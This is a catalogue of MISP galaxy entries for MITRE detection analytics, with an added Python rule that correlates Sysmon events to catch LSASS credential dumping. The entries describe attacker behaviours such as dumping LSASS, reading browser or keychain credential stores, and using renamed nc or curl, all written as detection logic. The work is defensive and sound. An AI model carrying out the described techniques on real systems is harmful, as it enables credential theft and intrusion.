Analytic 0130 - AN0130

Detection focuses on processes that attempt to locate, access, or exfiltrate local Outlook data files (.pst/.ost) using file system access, native Windows utilities (e.g., PowerShell, WMI), or remote access tools with file browsing capabilities. The behavior chain includes directory enumeration, file access, optional compression or staging, and network transfer.

Internal MISP references

UUID 11cd0577-97e6-4def-a86b-fe167ae4e33d which can be used as unique global reference for Analytic 0130 - AN0130 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0130
mitre_platforms ['Windows']

Analytic 1030 - AN1030

A non-privileged or abnormal process attempts to open a handle with full access (0x1F0FFF) to lsass.exe and subsequently invokes memory dump, file creation, or registry modification indicative of credential scraping. This behavior chain reflects staged credential theft activity.
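The staged chain above as an added example over constructed Sysmon records (not MITRE's code): a ProcessAccess event (Event ID 10) on lsass.exe is kept only when the granted access mask includes PROCESS_VM_READ and the source is not on an allowlist, the call trace is checked for the MiniDump libraries and for unbacked ("UNKNOWN") frames, and a FileCreate (Event ID 11) from the same process GUID inside a short window is attached. The allowlist and window are assumptions; note that Event ID 10 names the GUID field SourceProcessGUID while Event ID 11 uses ProcessGuid.

```python
"""Correlate Sysmon ProcessAccess (EID 10) on lsass.exe with a dump file written
(EID 11) by the same process shortly afterwards.  Records are constructed."""
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010     # the one right every memory dump needs; 0x1F0FFF is PROCESS_ALL_ACCESS
DUMP_LIBRARIES = ("dbghelp.dll", "dbgcore.dll")   # MiniDumpWriteDump is implemented here
# Sources that legitimately read LSASS memory (AV/EDR engines, Windows components).
# An allowlist for this example, to be replaced with the environment's own.
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe", r"c:\windows\system32\csrss.exe",
                   r"c:\windows\system32\wininit.exe", r"c:\windows\system32\services.exe",
                   r"c:\windows\system32\lsm.exe"}


def correlate(events, window=timedelta(seconds=60)):
    accesses = [e for e in events if e["EventID"] == 10
                and e["TargetImage"].lower().endswith("\\lsass.exe")]
    files = [e for e in events if e["EventID"] == 11]
    findings = []
    for a in accesses:
        granted = int(a["GrantedAccess"], 16)
        if a["SourceImage"].lower() in ALLOWED_SOURCES or not granted & PROCESS_VM_READ:
            continue   # query-only handles (e.g. 0x1000) cannot read memory
        reasons = [f"handle to lsass.exe with GrantedAccess {a['GrantedAccess']} from {a['SourceImage']}"]
        trace = a.get("CallTrace", "").lower()
        if any(lib in trace for lib in DUMP_LIBRARIES):
            reasons.append("call trace passes through the MiniDump libraries")
        if "unknown" in trace:
            reasons.append("call trace contains UNKNOWN frames (code in unbacked memory)")
        # EID 10 carries SourceProcessGUID, EID 11 carries ProcessGuid: same value, different key
        for f in files:
            if f["ProcessGuid"] == a["SourceProcessGUID"] and a["UtcTime"] <= f["UtcTime"] <= a["UtcTime"] + window:
                delay = int((f["UtcTime"] - a["UtcTime"]).total_seconds())
                reasons.append(f"wrote {f['TargetFilename']} {delay}s later")
        findings.append({"source": a["SourceImage"], "guid": a["SourceProcessGUID"],
                         "severity": "high" if len(reasons) > 1 else "medium", "reasons": reasons})
    return findings


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")   # Sysmon UtcTime format


GUID_A = "{a1b2c3d4-0001-0000-0000-000000000001}"
GUID_B = "{a1b2c3d4-0002-0000-0000-000000000002}"
GUID_C = "{a1b2c3d4-0003-0000-0000-000000000003}"
GUID_D = "{a1b2c3d4-0004-0000-0000-000000000004}"
LSASS = r"C:\Windows\system32\lsass.exe"
NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"

SAMPLE_EVENTS = [
    # dump tool: read access, dbgcore in the call trace, .dmp written seconds later
    {"EventID": 10, "UtcTime": _t("2024-05-01 10:00:00.000"), "SourceProcessGUID": GUID_A,
     "SourceImage": r"C:\Users\bob\Downloads\pd.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF",
     "CallTrace": NTDLL + r"|C:\Windows\System32\KERNELBASE.dll+2fe5f|C:\Windows\SYSTEM32\dbgcore.DLL+1f8d5|C:\Users\bob\Downloads\pd.exe+1a2b"},
    {"EventID": 11, "UtcTime": _t("2024-05-01 10:00:03.500"), "ProcessGuid": GUID_A,
     "Image": r"C:\Users\bob\Downloads\pd.exe", "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\lsass.dmp"},
    # AV engine: allowlisted
    {"EventID": 10, "UtcTime": _t("2024-05-01 10:01:00.000"), "SourceProcessGUID": GUID_B,
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": NTDLL},
    # query-limited handle from WMI provider: no VM_READ, ignored
    {"EventID": 10, "UtcTime": _t("2024-05-01 10:02:00.000"), "SourceProcessGUID": GUID_C,
     "SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": NTDLL},
    # full-access handle taken from unbacked memory, nothing written: in-memory scraping
    {"EventID": 10, "UtcTime": _t("2024-05-01 10:03:00.000"), "SourceProcessGUID": GUID_D,
     "SourceImage": r"C:\Windows\Temp\svc.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1F0FFF", "CallTrace": NTDLL + "|UNKNOWN(000001F2A4B00000)"},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["severity"], f["source"], "->", "; ".join(f["reasons"]))
```

Sysmon only emits Event ID 10 for the access masks selected in its configuration, so the rule is only as good as the ProcessAccess filter that feeds it; a filter that records every handle to lsass.exe and lets this code do the mask logic is the safer configuration.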

Internal MISP references

UUID 2b0dd3b6-6949-4dd5-b0dd-7b0b6f431dbe which can be used as unique global reference for Analytic 1030 - AN1030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1030
mitre_platforms ['Windows']

Analytic 0013 - AN0013

Execution of renamed or relocated native macOS utilities with uncommon names or non-default paths (e.g., renamed osascript, bash, or curl).

Internal MISP references

UUID 3349af7c-3cea-4424-b2a4-056fedb63831 which can be used as unique global reference for Analytic 0013 - AN0013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0013
mitre_platforms ['macOS']

Analytic 1300 - AN1300

Detects modification of shared network folders via .app bundles or scripting files with hidden extensions (e.g., double extensions like docx.app).

Internal MISP references

UUID 3f36a861-3be2-4f6d-bfad-f044cdc01b15 which can be used as unique global reference for Analytic 1300 - AN1300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1300
mitre_platforms ['macOS']

Analytic 0031 - AN0031

Outbound traffic with anomalous payload sizes and patterns from non-networking processes, often observed via packet inspection or connection logs.

Internal MISP references

UUID 4c7d92bb-4b46-44e4-b070-43c46d3193c4 which can be used as unique global reference for Analytic 0031 - AN0031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0031
mitre_platforms ['Linux']

Analytic 0310 - AN0310

Detection monitors SaaS collaboration tools (e.g., Slack, Zoom, Jira) for messages or files containing credential-like patterns, or for suspicious API calls retrieving bulk chat histories by non-admin users. Identifies adversary behavior chains where chat logs are queried via APIs or integration bots to systematically extract sensitive material.

Internal MISP references

UUID bafd38ad-aebd-40f1-9f17-bd63a1c74ba9 which can be used as unique global reference for Analytic 0310 - AN0310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0310
mitre_platforms ['SaaS']

Analytic 1003 - AN1003

User creation or modification via dscl with IsHidden=1, UID<500, or plist edits to com.apple.loginwindow Hide500Users flag. Defender view: correlation of hidden account attributes with login screen exclusion.

Internal MISP references

UUID cabc275f-5097-4d2e-aabe-b49a31ba87b9 which can be used as unique global reference for Analytic 1003 - AN1003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1003
mitre_platforms ['macOS']

Analytic 0301 - AN0301

Detection of OAuth consent phishing or malicious login attempts initiated through spearphishing links. Behavior chain includes inbound email with OAuth URL → consent page visited → unusual token grants logged in IdP logs.

Internal MISP references

UUID cfc7b6bc-2ca3-4407-a835-b40bf6a98efc which can be used as unique global reference for Analytic 0301 - AN0301 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0301
mitre_platforms ['Identity Provider']

Analytic 0410 - AN0410

Detection of firewall ACL or rule base changes through CLI (e.g., no access-list, permit any any). Monitor configuration commits from unusual users or sessions.

Internal MISP references

UUID 1216ae5e-bc5c-4672-a216-2706fb9ba3df which can be used as unique global reference for Analytic 0410 - AN0410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0410
mitre_platforms ['Network Devices']

Analytic 1400 - AN1400

Detects ptrace- or memfd-based process injection through audit logs capturing system calls (e.g., ptrace, mmap) targeting running processes along with suspicious file descriptors or memory writes.

Internal MISP references

UUID 61282e0a-3eae-4358-8821-6c8318961e24 which can be used as unique global reference for Analytic 1400 - AN1400 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1400
mitre_platforms ['Linux']

Analytic 1004 - AN1004

Unusual or unauthorized external remote access attempts (e.g., RDP, VPN, Citrix) → repeated failed logins followed by a successful session from uncommon geolocations or outside business hours → subsequent internal lateral movement or data exfiltration activities.

Internal MISP references

UUID 63583dcb-dbdc-4b9d-a261-3129de12327e which can be used as unique global reference for Analytic 1004 - AN1004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1004
mitre_platforms ['Windows']

Analytic 1040 - AN1040

Execution of file enumeration commands (e.g., 'dir', 'tree') from non-standard processes or unusual user contexts, followed by recursive directory traversal or access to sensitive locations.

Internal MISP references

UUID 69d9d158-aa43-4b73-b9a4-f1a2dc6c13c1 which can be used as unique global reference for Analytic 1040 - AN1040 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1040
mitre_platforms ['Windows']

Analytic 0401 - AN0401

Unexpected processes (e.g., bash, python, custom binaries) dynamically loading libcrypto or performing AES/RC4 encryption operations, then initiating outbound sessions with abnormal byte entropy or asymmetric traffic patterns.

Internal MISP references

UUID 8c64bf26-bda2-47fc-867d-bcc6a51d57a7 which can be used as unique global reference for Analytic 0401 - AN0401 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0401
mitre_platforms ['Linux']

Analytic 0014 - AN0014

Execution of renamed common utilities (e.g., bash, nc, python, sh) from atypical directories or with names intended to deceive defenders or EDRs.

Internal MISP references

UUID bd8beea8-48c8-41dc-8991-f8c739d10c70 which can be used as unique global reference for Analytic 0014 - AN0014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0014
mitre_platforms ['Linux']

Analytic 0104 - AN0104

Adversary registers a Windows device to Entra ID or bypasses conditional access by adding device via Intune registration pipeline using stolen credentials.

Internal MISP references

UUID d5dc64ab-bb69-4893-a155-84d403040e1a which can be used as unique global reference for Analytic 0104 - AN0104 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0104
mitre_platforms ['Windows']

Analytic 0041 - AN0041

Detects script or user activity copying files to a central temp or /mnt directory followed by archive/compression utilities.

Internal MISP references

UUID e9ee76c8-e959-4925-8f93-4b8fb66bc9f1 which can be used as unique global reference for Analytic 0041 - AN0041 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0041
mitre_platforms ['Linux']

Analytic 0140 - AN0140

Adversaries writing or moving payloads into directories configured as AV/EDR exclusion paths (e.g., /tmp, /var/lib, or custom directories from auditd exclusion rules). Defender perspective: detect file creation in paths matching known exclusions correlated with unusual parent processes.

Internal MISP references

UUID fd7bf05d-6f80-471c-99bf-7aa82ab25440 which can be used as unique global reference for Analytic 0140 - AN0140 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0140
mitre_platforms ['Linux']

Analytic 0150 - AN0150

Internal spearphishing via SaaS applications (e.g., Slack, Teams, Gmail): message sent from compromised user with attachment or URL, followed by click and credential access behavior.

Internal MISP references

UUID 1e2211b9-1730-4645-89f6-11259b35e0a4 which can be used as unique global reference for Analytic 0150 - AN0150 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0150
mitre_platforms ['SaaS']

Analytic 0501 - AN0501

Post-compromise identity & session anomalies that follow a drive-by compromise: token reuse from new/unfamiliar IPs, anomalous sign-in patterns for previously inactive users, unexpected consent/grant events, or provisioning changes. Defender sees an endpoint/browser compromise (network + endpoint signals) followed by unusual IdP events: new refresh token issuance, consent/consent-grant events, odd MFA bypass patterns, or unusual OAuth client registrations.

Internal MISP references

UUID 3154acf3-a5df-40bd-b4bc-3a210b6e5e0e which can be used as unique global reference for Analytic 0501 - AN0501 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0501
mitre_platforms ['Identity Provider']

Analytic 0015 - AN0015

From a defender's perspective, suspicious bridging is observed when network devices begin allowing traffic that contradicts existing segmentation or access policies. Observable behaviors include sudden modifications to ACLs or firewall rules, unusual cross-boundary traffic flows (e.g., east-west communications across separated VLANs), or simultaneous ingress/egress anomalies. Multi-event correlation is key: configuration changes on a router/firewall followed by unexpected traffic patterns, especially from unusual sources, are a strong indicator of compromise.

Internal MISP references

UUID 32d56b42-ff83-46d2-aeea-57a6958d3e83 which can be used as unique global reference for Analytic 0015 - AN0015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0015
mitre_platforms ['Network Devices']

Analytic 1500 - AN1500

Encrypted sessions detected with asymmetric key exchange anomalies on non-standard ports or with invalid/malformed certs. Defender correlates NetFlow/IPFIX with IDS/IPS detecting RSA exchanges outside expected TLS flows.

Internal MISP references

UUID 3e5930bf-6d79-4f75-9b9e-97cad9bf9232 which can be used as unique global reference for Analytic 1500 - AN1500 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1500
mitre_platforms ['Network Devices']

Analytic 0510 - AN0510

Detection correlates file creation or modification of .lnk (shortcut) files in autostart locations with anomalous parent-child process lineage or unsigned binaries. Defenders should watch for LNK creation/modification events outside of known software installations, patch events, or OS updates. Flag shortcut targets pointing to suspicious locations or unknown binaries, particularly those written by script interpreters or spawned from phishing delivery chains.

Internal MISP references

UUID 5f9fdff8-55ed-4b1e-8889-46b376ce7149 which can be used as unique global reference for Analytic 0510 - AN0510 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0510
mitre_platforms ['Windows']

Analytic 0051 - AN0051

Correlated modification of AppCompat registry keys and execution of sdbinst.exe to install custom shim databases. Followed by DLL injection via shim behavior into target application processes.

Internal MISP references

UUID 8fcdd234-c8d8-4d95-b381-91c92cb319b6 which can be used as unique global reference for Analytic 0051 - AN0051 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0051
mitre_platforms ['Windows']

Analytic 1050 - AN1050

Execution of AppleScript, bash, or launchd jobs that invoke delay functions (e.g., sleep, delay in AppleScript) with limited parent interaction and staged follow-on commands.

Internal MISP references

UUID 94871740-e9ae-458a-9d09-ef0f58c05905 which can be used as unique global reference for Analytic 1050 - AN1050 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1050
mitre_platforms ['macOS']

Analytic 1005 - AN1005

Repeated SSH, VPN, or RDP gateway authentication attempts from external IPs → subsequent successful logon → remote shell or lateral movement activity (e.g., scp/sftp).

Internal MISP references

UUID a3bca3ec-fd25-4b9d-bbce-9575ba96b8ef which can be used as unique global reference for Analytic 1005 - AN1005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1005
mitre_platforms ['Linux']

Analytic 0105 - AN0105

Detects unauthorized access to web browser credential stores (e.g., Chrome Login Data, Edge Credential Locker) by processes other than the browser itself. Correlates file reads of credential databases with subsequent API calls to CryptUnprotectData or memory inspection attempts.

Internal MISP references

UUID c4eb93f1-0288-4884-bdbc-800e7a8e87c3 which can be used as unique global reference for Analytic 0105 - AN0105 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0105
mitre_platforms ['Windows']

Analytic 0061 - AN0061

Adversary disables or stops critical services (e.g., Exchange, SQL, AV, endpoint monitoring) using native utilities or API calls, often preceding destructive actions (T1485, T1486). Behavioral chain: Elevated execution context + stop-service or sc.exe or ChangeServiceConfigW + terminated or disabled service + possible follow-up file manipulation.

Internal MISP references

UUID 00449d4c-48c7-4977-bf38-86fbc4e79285 which can be used as unique global reference for Analytic 0061 - AN0061 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0061
mitre_platforms ['Windows']

Analytic 1006 - AN1006

Unexpected inbound or outbound VNC/SSH/Screen Sharing connections from external sources → repeated failed logins followed by success → remote interactive sessions or abnormal file transfers.

Internal MISP references

UUID 14f4930e-a2a5-45ae-9552-837c0a35e06b which can be used as unique global reference for Analytic 1006 - AN1006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1006
mitre_platforms ['macOS']

Analytic 1060 - AN1060

Detects lateral discovery or container breakout attempts using netcat, curl, or custom binaries probing other services within the same namespace or VPC subnet.

Internal MISP references

UUID 5d7b1be3-1c8a-40bf-a4d2-85e26dd82d76 which can be used as unique global reference for Analytic 1060 - AN1060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1060
mitre_platforms ['Containers']

Analytic 0160 - AN0160

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID 671050c7-7e86-4be7-9ab4-aa9c763fad44 which can be used as unique global reference for Analytic 0160 - AN0160 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0160
mitre_platforms ['macOS']

Analytic 0601 - AN0601

Detection of Mach-O binaries or AppleScripts that contain nested, encoded, or run-only embedded payloads dropped at runtime.

Internal MISP references

UUID 8cd6ae3d-7f14-42bf-9aff-870209fc333f which can be used as unique global reference for Analytic 0601 - AN0601 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0601
mitre_platforms ['macOS']

Analytic 0016 - AN0016

Adversary uses nltest, PowerShell, or Win32/.NET API to enumerate domain trust relationships (via DSEnumerateDomainTrusts, GetAllTrustRelationships, or LDAP queries), followed by discovery or authentication staging.

Internal MISP references

UUID c3be6c4a-3b3d-4a37-a1d8-2c4df915a7aa which can be used as unique global reference for Analytic 0016 - AN0016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0016
mitre_platforms ['Windows']

Analytic 0106 - AN0106

Detects attempts to access browser credential stores (e.g., Firefox logins.json, Chrome SQLite DB) or processes (e.g., gnome-keyring-daemon). Observes unauthorized file reads and memory inspection of browser processes using ptrace or gdb.

Internal MISP references

UUID e11709c9-0203-4f76-bbfb-379ed36723ce which can be used as unique global reference for Analytic 0106 - AN0106 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0106
mitre_platforms ['Linux']

Analytic 0610 - AN0610

Adversary manipulation of shared library paths, environment variables, or replacement of service binaries. Defender observes suspicious modifications in /etc/ld.so.preload, service config changes, or file writes replacing existing executables.

Internal MISP references

UUID e21542c4-8df8-4c9e-8b1d-2c9bbe058386 which can be used as unique global reference for Analytic 0610 - AN0610 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0610
mitre_platforms ['Linux']

Analytic 1600 - AN1600

Curl, wget, or custom HTTP clients initiated by uncommon user accounts or cron jobs to popular web services, with no observed response parsing logic.

Internal MISP references

UUID e83afa89-0ec1-49e7-b351-eef67b085480 which can be used as unique global reference for Analytic 1600 - AN1600 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1600
mitre_platforms ['Linux']

Analytic 1007 - AN1007

Connections to exposed container services (e.g., Docker API, Kubernetes API server) from unauthorized external IPs → abnormal container creation/start → lateral activity within cluster nodes.

Internal MISP references

UUID 04fcf3d4-4547-4e64-bbb7-9faa46dda1f6 which can be used as unique global reference for Analytic 1007 - AN1007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1007
mitre_platforms ['Containers']

Analytic 0107 - AN0107

Detects abnormal access to Safari credential stores (Keychain-backed) or Chrome/Firefox login databases. Observes processes executing security dump-keychain or directly reading credential files in ~/Library/Application Support. Correlates file access with suspicious process ancestry or unsigned binaries.

Internal MISP references

UUID 1a068df0-67d4-4521-aeda-75fa8e9f8d98 which can be used as unique global reference for Analytic 0107 - AN0107 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0107
mitre_platforms ['macOS']

Analytic 0710 - AN0710

Suspicious reuse of SSH agent sockets across multiple users or processes, anomalous access to ~/.ssh/ or /tmp/ssh-* sockets, and abnormal patterns of lateral movement via SSH without new authentication events. Defender view: detect when one process accesses another user's SSH agent or when an existing SSH connection is used to pivot unexpectedly.

Internal MISP references

UUID 3517708a-f80e-4335-a122-65b9b3505e8d which can be used as unique global reference for Analytic 0710 - AN0710 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0710
mitre_platforms ['Linux']

Analytic 0170 - AN0170

Detects modification of registry keys used for default file handlers, followed by anomalous process execution from user-initiated file opens. This includes tracking changes under HKCU and HKCR for file extension mappings, and correlating them with new or suspicious handler paths launching unusual child processes (e.g., PowerShell, cmd, wscript).

Internal MISP references

UUID 3ac58f14-32d6-4ce2-8aa7-e7c429dd6405 which can be used as unique global reference for Analytic 0170 - AN0170 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0170
mitre_platforms ['Windows']

Analytic 0701 - AN0701

Detects the creation or modification of .service unit files in system/user-level directories, combined with execution of systemctl, service, or dynamically created drop-ins via systemd generators. Detects persistence by analyzing the ExecStart path, file entropy, and symlink usage, especially when paired with execution from /tmp, /dev/shm, or unmounted volumes.

Internal MISP references

UUID 4da5660a-3b1c-4b4d-ad79-991bef456b20 which can be used as unique global reference for Analytic 0701 - AN0701 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0701
mitre_platforms ['Linux']

Analytic 1070 - AN1070

Adversaries collecting local files via PowerShell, WMI, or direct file API calls often include recursive file listings, targeted file reads, and temporary file staging.

Internal MISP references

UUID 79ecfad5-3439-4a04-919a-236d47652ba0 which can be used as unique global reference for Analytic 1070 - AN1070 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1070
mitre_platforms ['Windows']

Analytic 0017 - AN0017

Cloud login from atypical geolocation or user-agent string, followed by resource enumeration or infrastructure manipulation using cloud CLI/API.

Internal MISP references

UUID 7d4732f8-989c-4425-81c4-aa3e1bcb8d0e which can be used as unique global reference for Analytic 0017 - AN0017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0017
mitre_platforms ['IaaS']

Analytic 0071 - AN0071

Abuse of trusted Electron apps (Teams, Slack, Chrome) to spawn child processes or execute payloads via malicious command-line arguments (e.g., --gpu-launcher) and modified app resources (.asar). Behavior chain: suspicious parent process (Electron app) → unusual command-line args → child process creation → optional DLL/network artifacts.

Internal MISP references

UUID dc0bf4ca-1d65-46ee-b4b1-d8f73a6e0cda which can be used as unique global reference for Analytic 0071 - AN0071 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0071
mitre_platforms ['Windows']

Analytic 1700 - AN1700

Network traffic analysis may reveal processes communicating with malicious domains.

Internal MISP references

UUID 71fc481d-53f9-4a35-9879-e01e17f425f0 which can be used as unique global reference for Analytic 1700 - AN1700 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1700
mitre_platforms ['iOS']

Analytic 0081 - AN0081

User-initiated processes generating sustained outbound traffic over common or non-standard ports, often outside business hours, potentially linked to scanning or proxyjacking. Includes curl, wget, masscan, or proxy clients.

Internal MISP references

UUID 10e9d109-0a17-41cd-9d0b-67c679bc94b7 which can be used as unique global reference for Analytic 0081 - AN0081 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0081
mitre_platforms ['Linux']

Analytic 1008 - AN1008

Detect abnormally high volume of inbound email messages or repetitive attachments being delivered to a single mailbox within a short time window. Defenders should look for anomalous spikes in message counts and repetitive attachment file creation events correlated with targeted users.

Internal MISP references

UUID 1f515cf2-91a5-4bed-95a1-ed8fc8b24a87 which can be used as unique global reference for Analytic 1008 - AN1008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1008
mitre_platforms ['Windows']

Analytic 0180 - AN0180

Behavioral chain: (1) Safari/Chrome/Firefox/Office handles a URL; unified logs show open/click or LSQuarantine assignment, (2) outbound connection to untrusted domain, (3) a new file appears in ~/Downloads or /private/var/folders/* with quarantine flag.

Internal MISP references

UUID 3f615721-c62f-4229-9c6e-cb873b2591e5 which can be used as unique global reference for Analytic 0180 - AN0180 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0180
mitre_platforms ['macOS']

Analytic 0108 - AN0108

Executables written or modified in installer directories (e.g., %TEMP% subdirectories or Program Files installer paths) followed by execution under elevated context. Defender observes abnormal file replacement activity, process creation by installer processes pointing to attacker-supplied binaries, and unexpected module loads in elevated processes.

Internal MISP references

UUID 4f132f21-1287-4fc2-a13e-d7770d856610 which can be used as unique global reference for Analytic 0108 - AN0108 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0108
mitre_platforms ['Windows']

Analytic 0810 - AN0810

Detects login to admin consoles (e.g., Microsoft 365 Admin Center) from unrecognized users, devices, or geolocations followed by non-API data review or configuration read actions that suggest GUI dashboard use.

Internal MISP references

UUID a0bfcae2-1936-466d-91b4-f72fcae730b6 which can be used as unique global reference for Analytic 0810 - AN0810 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0810
mitre_platforms ['Office Suite']

Analytic 0801 - AN0801

Cloud API events where logging services are stopped, deleted, or modified in a way that disables audit visibility. Defender view: unauthorized StopLogging, DeleteTrail, or UpdateSink operations correlated with privileged user activity.

Internal MISP references

UUID a788e3ed-8faf-4443-bb26-fd530ca930d1 which can be used as unique global reference for Analytic 0801 - AN0801 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0801
mitre_platforms ['IaaS']

Analytic 0018 - AN0018

Federated login using SSO or OAuth grant to cloud control plane, followed by directory or permissions enumeration.

Internal MISP references

UUID ecb9db5c-55ef-48df-8ccb-f57db8c32a08 which can be used as unique global reference for Analytic 0018 - AN0018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0018
mitre_platforms ['Identity Provider']

Analytic 1080 - AN1080

Monitors for the creation of accounts inside containers using names that resemble legitimate orchestrator or backup identities to mask adversary persistence.

Internal MISP references

UUID fb767270-25ad-4fea-a8e7-8f9c57ac1fa8 which can be used as unique global reference for Analytic 1080 - AN1080 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1080
mitre_platforms ['Containers']

Analytic 1800 - AN1800

Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.

Internal MISP references

UUID 90052e39-40c3-4194-a2a2-fc240639ab0f which can be used as unique global reference for Analytic 1800 - AN1800 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1800
mitre_platforms ['Android']

Analytic 1090 - AN1090

Access to organizational directories via Google Workspace Directory API, Slack SCIM, or Okta SCIM by apps or identities outside normal roles.

Internal MISP references

UUID 089d588f-a6aa-4083-a900-ebcae97b5bfa which can be used as unique global reference for Analytic 1090 - AN1090 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1090
mitre_platforms ['SaaS']

Analytic 0190 - AN0190

Detection of phishing through anomalous Mail app activity, such as attachments saved to disk and immediately executed, or Safari/Preview launching URLs and files linked from email messages. Correlate UnifiedLogs events with subsequent process execution.

Internal MISP references

UUID 2a0cc1a9-db3b-4f05-8c85-29d69507418b which can be used as unique global reference for Analytic 0190 - AN0190 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0190
mitre_platforms ['macOS']

Analytic 1009 - AN1009

Monitor mail server logs (e.g., Postfix, Sendmail) for excessive connections or inbound message counts targeting a single recipient. Correlate with repetitive attachment storage in /var/mail or /var/spool/mail directories.

Internal MISP references

UUID 31e4c4dc-3094-45b2-9d4d-1b0bf8311498 which can be used as unique global reference for Analytic 1009 - AN1009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1009
mitre_platforms ['Linux']

Analytic 0091 - AN0091

Suspicious use of attrib.exe or PowerShell commands to set hidden attributes on files/directories. Defender view: processes modifying file attributes to 'hidden' or creating files with ADS (alternate data streams).

Internal MISP references

UUID 4ea80ec4-bfcc-4bd6-b986-aa2c9fe2d8d6 which can be used as unique global reference for Analytic 0091 - AN0091 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0091
mitre_platforms ['Windows']

Analytic 0910 - AN0910

Execution of QEMU, KVM, or VirtualBox processes with unusual flags (e.g., '-nographic', '-snapshot'). File creation of VM images in atypical directories. Defender view: monitoring audit logs for process executions and file modifications linked to hidden virtualization.

Internal MISP references

UUID 79ba9430-eeb0-4fce-9757-bb81fc2a43d5 which can be used as unique global reference for Analytic 0910 - AN0910 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0910
